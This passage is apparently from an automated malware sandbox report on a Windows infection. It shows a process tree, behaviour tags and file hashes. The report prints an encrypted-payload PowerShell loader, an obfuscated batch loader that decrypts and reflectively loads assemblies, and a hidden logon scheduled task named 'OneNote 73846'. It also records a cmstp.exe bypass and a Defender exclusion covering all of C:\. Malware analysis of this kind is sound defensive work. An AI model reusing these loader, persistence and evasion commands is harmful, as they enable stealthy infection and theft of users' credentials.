 y x U 5 E D X h y N Z S r v v Z B y n R Z k g H E p J L O K S w R n H 8 J H 6 V u + L w D s h C V Q 1 A 7 C P / F V W p L c Y 3 U 3 v L v k N A T 6 + o v 9 U I m p Y H 1 h h T n v k u i M 5 U N H z 4 q W l v 7 k V 5 w e Q U o + K d t o l P Z W f / c H f t T W k N 9 C F M m 6 N W L W F f s z 8 3 T c c v r 4 + s 8 r A j T 0 T 0 Y n 8 m B g X 3 F 8 A d u 8 1 o B r + c Q z S s U b Z 7 9 0 I t u U N 0 w x j l o I n q j F W u j + 1 4 m y d c K Z p 1 Z R D u X F P b k 1 b Q V N H c a K w q 6 1 s S w n R w 6 z A W 2 e 8 N v p e W R V L a H e + Q V Y j 0 A T s r n y T 5 i 0 i p g 6 1 S u l 4 1 2 5 G 0 n 5 H K 6 E + 2 b p I j T t W 8 w G x V 2 Y C G r Z d y X l 2 E K 4 N A R 3 s N x / 1 d Q q
 b D L 5 c N T Y 0 Q h s V f i c W 8 o w n 3 V s U / g K G V K A 5 N V 7 C f b e e v j R q 1 8 r r 2 F 8 Y n X s 7 J 8 Z 2 q c 2 t T J b G U 8 N O V q 0 m p b Z H U a + j G 3 b S m Y 9 N e U B E e Y o / n r q Q I 2 o s 6 n B t h z u + R B e v x T 6 n e p B H D p k U O x C U P N F N 0 1 s 5 n W k N 5 M Q k u H 5 / f T e D t h E r j d r a Q f l 5 A w i v d e 5 p u q G U q d t l 6 T / a / D t 9 6 W r V 4 M Z R 3 r q a F 4 U 6 d 6 E x c a w T t d g 6 G C 3 l J K P W l 7 E W V z e R Q L z 1 q x + H B T 5 4 2 F 5 8 4 F z f Z s Z u e / p Z M K 7 3 A f j h g N 6 j Q h X h 3 t x e I a 1 L D F V p d X E E a Z / z B p i q U s H G Q W z N P i p d L A J t 7 / v b G H 4 N 1 V L K y l j p 3 G 6 w t d g T B s D q A g t z W 3 Q K W W M S J 1 t f x v B 3 9 2 V 0 e J B w D s T T e X f 7 / / Z t z / j Q z m T l 4 J G R y C Q 3 N J G d h o z j v o b T A l J 0 c 9 k O W 3 w f S U h 5 K U 6 0 2 t j S c l 9 6 Q X 8 I y + 7 u Y z n N 7 m / o C B n Q A A K q B 2 W z y v 2 Z F F + J Z G j w H U G t / d E O y y 9 6 r 0 U z u X Q 9 m 8 Z y P l O t r N w T j K X U T r f / b p d N H / O L z 1 I Q B 6 1 j U I T E W A H 1 u + J s P o g w x H 5 T h K r Y e i P z 2 5 h Q s m u e Y m n H 3 h Y J w 8 3 6 d k n x 1 x o L A R e a + g N 6 E Z A I i K J n P V F K Q 4 1 J F D r b p s e O C c 5 j M y k C w 0 H T q 5 I S u y p r e l e u t E D Z i w 8 R W M i k m 0 4 c j c j D z M R y E 7 N F w d S Z / F r H l u I / L a K M q x M w c k p d h 5 + x 6 c o f I V Z W 4 d O l k 5 q Y p F v z C A C 6 C K p 5 R z C c F V 5 D N V 8 U p x L g X 7 2 a B 9 K x 4 G q u e 5 7 E 4 u i o s x U Y s r d k u j t w g w r Z y M z 4 i K u e t 4 Y 1 i U C v 8 J 5 V c T H 8 4 2 A r S l v p r w f B m R Q B v 0 B o Q c q L l m I B B F U h m 2 f A n z i + P 8 0 N 7 d X g k 4 c W 8 6 V f F K 5 F 9 8 n 4 m 1 k Z w l w C F i Z F j c t w t j 0 d K 0 i 7 h P F o c m t d X Z S n Y z 5 5 I z c C 1 K N J R k a B y I 1 y F 3 Y B + l Y A z 5 q / 9 b H 4 8 t m e F D s l j K V i 3 g 7 Z o N 0 B 8 Q N Q d g p h 8 K f N 6 B Q r 2 Y R Z P h O 0 E R O
 l l V E 5 L A f I s O O K s P k Y 7 1 e U z v o B B w X n X u G + i o E 2 8 w + r W C D h 0 X F i Q G 7 E / L 6 0 H y n O J b A Q M C W N b O r 6 7 L M N / z O S 3 s c k V U Q H 8 g k F u L l n M n 0 x r t c J N 9 9 Z 8 D 4 x d e F + a K 2 A M I e l f C a c m 9 t O 9 g j n q E u a Q n f Z v 4 Y z 5 q J k a 2 L G 3 T D p M H z s U A q S c B H K d c a c M R i 7 c 4 e A l I z E c u a E I N 8 s I d H C z U D F L b 2 G Y u 1 l u P a i Y d M Q O l / J F H x u f B 4 n r m j M B c t 7 d C r k X l W 6 j I 9 I C e v 7 7 H E B C u I q S X A e u 5 p o r 9 l Q 4 7 k t 8 d f 1 O 8 o Z x D n 1 w g 4 V j 8 n f S s 6 o Z 8 B C e t y o t S s O p y B J Y W 2 n i s F + x O d o q h C V h + D h n c Q T T / K 8 L 9 9 s h B i j r U q X P N L p J l 9 y d 8 W q 7 f H u V G s d r y h p c I z D 2 e r z / F u b / 9 0 i u N t F 2 5 L / j x E u n 0 1 n A 3 v 2 Y 7 7 T 2 I Q 6 S b 1 7 e o j j 9 x C w A H 2 8 6 4 X x k X h P W O q l v d i w c R z / W y E J 3 D 1 9 i I D 3 s 9 s k H A h 7 I K 6 A 3 j U U g / F w M d T P 7 k G m e 1 o f U H / B L D R K B + C b 9 x P / i j T W z t R B M T Q 7 3 4 q A B t 2 N p C K K O H k f u u q y O f q C R 6 S 8 j n b 3 P o + g N 2 9 5 n q g 2 0 T X m Q F r f 5 V d l V J T R p 2 m J 0 b j W l 2 4 Q W T c I E a P r 0 m z Z c L u 9 s C 7 P d + P + 7 W / 3 g b 0 L a p h H v 1 W M 2 o c B 8 G R l a m Z m 8 L M 2 g k X b D Z n a M e 4 m U F O X q b z y D A 5 m m s M 7 p 8 b 6 Q + Y R N w V e / G q 7 L 5 E 8 h + k N S 5 8 8 R 9 1 b H 5 v M N N i N B n Y 2 8 Q 6 4 d L 1 J n 1 e p p D H 8 R f N i z D a Q y m d / 2 D S w E G 0 9 j + E B R v L q C s v W E f G 8 7 S f w q c / U e e O 2 Z o A l N 2 W 4 P 6 q M B 6 S h x e S h 8 v F m b 9 p c Q e x L i b R x p v 0 y R 9 B Y f T R q h 6 3 Q x h r G t t K x R P s W b J 5 e C V b p n y g L o g P E S c b r t o a R S d j E w e T t V P G y 6 r j 7 u X A s 9 e 2 y u L z v D e R V W 4 s U R T I 6 w 6 V o M 0 M R J F D V 3 Q n f 4 n R C T B F q 8 X L P q A y y 7 X O w 9 w R e 2 S C n K Z b Q L L V Y G w 2 M E + 5 L 5 h m i c i y a l D z
 S I r D 5 4 M M W k 1 C m y Y 0 j V 0 L v H H W d f y b 9 1 P 9 L N i K X h 3 S w m W w B P H 1 H r S W j U M z N d B 7 I s 3 W r n N C D w p C F V W + U U I N x N l 1 y X y 8 c E R R S 0 r B S X O 6 6 C 6 e / P 2 c v X g r x t N A J T W c M F A A = = " ) 
         $ i   =   $ d [ 0 . . 1 5 ] 
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ] 
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d 
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C 
         $ a e s . K e y   =   $ a 
         $ a e s . I V   =   $ i 
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( ) 
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h ) 
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t ) 
         I n v o k e - E x p r e s s i o n   $ r e s 
  -inputFormat xml -outputFormat text3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aaoblhbk\aaoblhbk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:596
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B94.tmp" "c:\Users\Admin\AppData\Local\Temp\aaoblhbk\CSC338374BE2ED47E89F22B14CAADD0CD.TMP"5⤵
PID:3936
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\dmsob5ff.inf4⤵
PID:2636
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2100
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3948
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG 
([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "4⤵
PID:4236
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3092
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:356
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network73846Man.cmd';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG 
([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "7⤵
- System Location Discovery: System Language Discovery
PID:2544
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1588
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1092
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network73846Man')8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:396
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3132
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\swlbfxaifxztgzmyjbs"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1596
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqqmgqkjbfryifacbmedcp"8⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:628
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fkwehiddpnjkstwgkxrenczsz"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1680
C:\Windows\system32\timeout.exetimeout /nobreak /t 14⤵
- Delays execution with timeout.exe
PID:4484
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess Powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize: 1KB
  MD5: 938ffc2cba917b243d86b2cf76dcefb4
  SHA1: 234b53d91d075f16cc63c731eefdae278e2faad3
  SHA256: 5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
  SHA512: e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
- Filesize: 21KB
  MD5: 49f4e601c846e84545aa6208f82c4e32
  SHA1: 0505188d7b488ff547ecf2ed7454cff02c34581e
  SHA256: 7fc6ff6c2ef7d04d3c6f2ca8dabe680033e38cd1c2ab88d2c0f699da7f21ffe2
  SHA512: 653a28cc0bf8db0ab29929ade6366589d45d359ba9dd8f2cdbb406603213578c9c85e4c644feec46770a9cc1caf3edcd2585beb1fc277a6c6f3263362ecbd454
- Filesize: 20KB
  MD5: abc44172116e7874857d1f74b37bb732
  SHA1: ae24f4465f9c0eae5ee6e41daba4f627243cc89a
  SHA256: e97ea2858af9bbb4051dc9def961d7d85058d1c8af21067d2b3e5921c180f9a8
  SHA512: d255c4cf472fd251114b4d2a8cc86c5d0c976363ef35aa2ae78893b3e7d14d1771d52856a4586be0ca47ad7e710a21418c5279a84d1c019bf28dbcc354398247
- Filesize: 21KB
  MD5: a811e94bfc0bc73da368d03164b02dde
  SHA1: 2312067111cff958bacbdba72fcccfd5c81f807d
  SHA256: cad41609af8afa3305bc329c340002e516a3e0e5b9b2e5a69ec57b669608025f
  SHA512: 531ac2ba0fec8aeaafbcd34b974eba57ca102bf03cd3272e8657afc91cbb165219f7b27fb659413f1901fe623a1c4038a22b7f599104f82ccb88b5a3753eb424
- Filesize: 20KB
  MD5: 39610ef65838d514691bf25f45ec1d00
  SHA1: f67a1af760598f8783b3bb55eaff48dc48dc9fe9
  SHA256: 19c5aa213aacf12f9fbb858559d2bf32c83ead2e6a96601738f0a6a377fb0d21
  SHA512: 290b4d58d3863bc36f90911b468fcaf84ac7497ca996de98210c709dba829884a43965904aeed6e0aa072617bae2b83f6c104fe9f7f23f0f7e96076d83809b43
- Filesize: 1KB
  MD5: 4abdf5877984973df7031e02dcdaa957
  SHA1: 600bf4203f4cd3201b0595c9bd499d93ea9ebfc4
  SHA256: 098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe
  SHA512: f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d
- Filesize: 1KB
  MD5: b66db53846de4860ca72a3e59b38c544
  SHA1: 2202dc88e9cddea92df4f4e8d83930efd98c9c5a
  SHA256: b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
  SHA512: 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527
- Filesize: 1KB
  MD5: 8b1a3b9961b46a75b6394f9a310c019b
  SHA1: e2e4bfa6b841ef7768ea57e6b06ca24cb24a65e1
  SHA256: 4018373d34fa024ebbb2932c360e82c6b15291012f45e7cb1b41c61bff8cf667
  SHA512: 880b4fef5fe8b25b42e590ebf6f3eb8d385b586d3672aec01a87c6401ae8d3f26ac840118b8f91885083cd67ea606765b812835302063d81241036df6eb455b6
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 4KB
  MD5: 94c4156521fcea4ac164948475669a20
  SHA1: 1fe91d54689895e23355736a157ddae5a93b733b
  SHA256: 6a2e70ad3ef0a0e5dc6a39b13faadfc28bf90ec1cae7791c580d0bbfda74caae
  SHA512: 641ffbae2c1677debe806eeeb46a4f9f86dc2e4f5e642ff1fe733a77d11ef11eb3ba242b1cc276f24aa81f6bcf4d169ca7dca0dd28fbdb88576c0bae86073637
- Filesize: 562KB
  MD5: d1d99208a499e870e1e0a34a2cbba829
  SHA1: 85f7090ce76bdae0a07154b27117ec5ac9e9f673
  SHA256: d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879
  SHA512: badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497
- Filesize: 4KB
  MD5: f1d2c01ce674ad7d5bad04197c371fbc
  SHA1: 4bf0ed04d156a3dc6c8d27e134ecbda76d3585aa
  SHA256: 25b006032deccd628940ef728fffe83b325a85de453a34691f55f570e4460094
  SHA512: 81cb982cc33dcc27600a8a681c3ec3cc5b9221b95baa45e1ab24479745a9638b9f31d7beeeb1128b3294ff69b44e958c75e25d565f66790c364665caff96ee77
- Filesize: 655B
  MD5: a50ad3c72d773f4374ccb89b74a7b0ea
  SHA1: 2efe6cda55cd90cfda1f6af35686f813e252a607
  SHA256: f48f5fbc541f12fcb33c204ad87fc80b693fd3241ecd1b79dbe2b6cc7b636f5a
  SHA512: d564a299836e15f8139263ffbd165a0f1fa6b6c0b30b6d037f7822aacea5351e7f8f461422e5258e754e4e80d1aa7b4773d91632b1c0264a64020fba5b9b728f
- Filesize: 652B
  MD5: 28604cc947937aa6d3e72e5ce3265af3
  SHA1: 9c07d11d7396549ddbcf5005401071828eed9324
  SHA256: 675326cd2aee386c057a95bef1dd9f1cb0ba9656d4ed899f87bc2f404496b5a0
  SHA512: 97e82671d57a3ad5617f2893868d8f016d645afcc5bcf921fe8676b670f7016c5ea0f05d3961ef5f456418a2edc9ff62ce83eb0864224398cf8b156749d8ebb0
- Filesize: 2KB
  MD5: da774b7c7335bf78596f22c13b46a80c
  SHA1: 43d248947111e2d943aa1c77df51fd5192e92797
  SHA256: da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8
  SHA512: 9c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0
- Filesize: 369B
  MD5: a021631729438b06ee07a5338f788fb9
  SHA1: 89369a2005187bcf69d768681bf9a89ff06b257b
  SHA256: 1cf7e0be9f4b8bfd45395089864e7c6795f55a6c9009ca2003d267198f82f16d
  SHA512: 5cda0eac6e00fb507c0e031f5e5a735cd9471a0a4819aedd3cbd796cb8f23dd10c3fc95ff63baa7c4466c722642bfb81d78644491c0d331389c60bf36d7ceb87